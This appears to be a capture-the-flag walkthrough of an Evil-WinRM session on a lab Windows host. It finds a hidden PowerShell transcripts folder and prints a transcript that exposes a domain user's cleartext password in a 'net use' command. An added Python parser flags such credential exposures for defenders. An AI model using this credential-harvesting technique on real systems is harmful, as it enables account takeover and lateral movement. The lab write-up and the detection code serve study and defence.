PowerShell Transcript
Checking the target system environment after performing some basic enumeration
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 6/10/2023 11:59 AM Windows
At first glance, there isn't anything unusual about this system.
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 6/10/2023 11:20 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 6/10/2023 11:59 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 6/10/2023 6:43 AM 402653184 pagefile.sys
Checking hidden files and directories with the -Force flag, however, reveals an unusual directory: C:\PSTranscripts.
The C:\PSTranscripts\ directory is not a default system directory in the root of the C:\ drive; it is not part of a standard Windows installation. It is, however, a directory commonly used to store transcripts of PowerShell sessions, which are records of the commands run during a session and their output.
It was most likely created manually by a PowerShell user, or by a PowerShell script or module installation, to keep session transcripts for record-keeping or troubleshooting. It is also possible that it was generated by the Start-Transcript cmdlet, or by the system-wide PowerShell transcription policy, which writes into a configured output directory and creates a date-named subfolder per day.
*Evil-WinRM* PS C:\> cd PSTranscripts ; ls -Force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\PSTranscripts> cd 20191203 ; ls -Force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Going through the 2 nested sub-directories, there is a single text file. That must be it.
*Evil-WinRM* PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
start time: 20191203063201
username: MEGABANK\ryan
runas user: MEGABANK\ryan
machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
host application: C:\Windows\system32\wsmprovhost.exe -Embedding
process id: 2800
psversion: 5.1.14393.2273
psedition: Desktop
pscompatibleversions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
buildversion: 10.0.14393.2273
clrversion: 4.0.30319.42000
wsmanstackversion: 3.0
psremotingprotocolversion: 2.3
serializationversion: 1.1.0.1
**********************
command start time: 20191203063455
**********************
ps>terminatingerror(): "System error."
>> commandinvocation(invoke-expression): "Invoke-Expression"
>> parameterbinding(invoke-expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> commandinvocation(out-string): "Out-String"
>> parameterbinding(out-string): name="Stream"; value="True"
**********************
command start time: 20191203063455
**********************
ps>parameterbinding(out-string): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
command start time: 20191203063515
**********************
ps>commandinvocation(invoke-expression): "Invoke-Expression"
>> parameterbinding(invoke-expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> commandinvocation(out-string): "Out-String"
>> parameterbinding(out-string): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
start time: 20191203063515
username: MEGABANK\ryan
runas user: MEGABANK\ryan
machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
host application: C:\Windows\system32\wsmprovhost.exe -Embedding
process id: 2800
psversion: 5.1.14393.2273
psedition: Desktop
pscompatibleversions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
buildversion: 10.0.14393.2273
clrversion: 4.0.30319.42000
wsmanstackversion: 3.0
psremotingprotocolversion: 2.3
serializationversion: 1.1.0.1
**********************
**********************
command start time: 20191203063515
**********************
ps>commandinvocation(out-string): "Out-String"
>> parameterbinding(out-string): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
at line:1 char:1
+ cmd /c net use x: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ categoryinfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ fullyqualifiederrorid : NativeCommandError
cmd : The syntax of this command is:
at line:1 char:1
+ cmd /c net use x: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ categoryinfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ fullyqualifiederrorid : NativeCommandError
**********************
Windows PowerShell transcript start
start time: 20191203063515
username: MEGABANK\ryan
runas user: MEGABANK\ryan
machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
host application: C:\Windows\system32\wsmprovhost.exe -Embedding
process id: 2800
psversion: 5.1.14393.2273
psedition: Desktop
pscompatibleversions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
buildversion: 10.0.14393.2273
clrversion: 4.0.30319.42000
wsmanstackversion: 3.0
psremotingprotocolversion: 2.3
serializationversion: 1.1.0.1
**********************
Based on the content of the transcript file, it appears that the user with the username "MEGABANK\ryan" was attempting to perform the following actions:
- The user executed a command to invoke the expression -join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> '). This command constructs a prompt string that includes the session ID, username, computer name, and current directory.
- The user encountered a "System error" terminating error, which caused the PowerShell session to exit.
- Afterwards, the user got a new command prompt, PS megabank\ryan@RESOLUTE Documents>, which suggests that the user had navigated to the Documents directory.
- Next, the user executed a command to invoke the expression cmd /c net use x: \\fs01\backups ryan Serv3r4Admin4cc123!. This command is an attempt to map a network drive (X:) to the UNC path \\fs01\backups using the provided username and password.
That is the CLEARTEXT credential for the ryan user.
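A defender triaging a transcript like this one wants the same facts pulled out mechanically: who ran what, when, and which commands put a secret on the command line. The following is an added example, not code from this write-up; it parses the block layout shown above and flags such commands. The sample transcript, the placeholder password and the function names are all constructed here.

```python
import re

# Constructed sample in the layout of the transcript above; the password is a placeholder.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Username: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan PLACEHOLDER_PW
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
"""

# Command shapes that put a secret on the command line; checked case-insensitively, first match wins.
CREDENTIAL_PATTERNS = [
    (r"\bnet\s+use\b.*/user:\S+\s+\S+", "net use /user: followed by a password"),
    (r"\bnet\s+use\b.*\\\\\S+\s+\S+\s+\S+", "net use with positional user and password"),
    (r"-AsPlainText", "ConvertTo-SecureString -AsPlainText"),
]

def parse_transcript(text):
    # Header fields first, then the blocks delimited by lines of asterisks.
    info = {"commands": []}
    for field in ("username", "machine"):
        m = re.search(rf"^{field}:\s*(.+?)\s*$", text, re.I | re.M)
        info[field] = m.group(1) if m else None
    start = None
    for block in re.split(r"^\*{5,}\s*$", text, flags=re.M):
        block = block.strip()
        m = re.match(r"command start time:\s*(\d+)", block, re.I)
        start = m.group(1) if m else start
        # Invoke-Expression logs the command text as a quoted value (embedded quotes not handled).
        for cmd in re.findall(r'name="Command"; value="(.*?)"\s*(?=\n>>|\Z)', block, re.S | re.I):
            info["commands"].append((start, cmd.strip()))
    return info

def find_credential_exposures(commands):
    # Only the first line is checked: the exit-code wrapper on the next line is not the user's command.
    hits = []
    for start, cmd in commands:
        first_line = cmd.splitlines()[0] if cmd else ""
        for pattern, reason in CREDENTIAL_PATTERNS:
            if re.search(pattern, first_line, re.I):
                hits.append({"start_time": start, "command": first_line, "reason": reason})
                break
    return hits
```

Run over a real transcript directory, the output is a list of timestamped commands that should trigger a credential rotation and a review of who could read the transcript files.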
Moving on to the Lateral Movement phase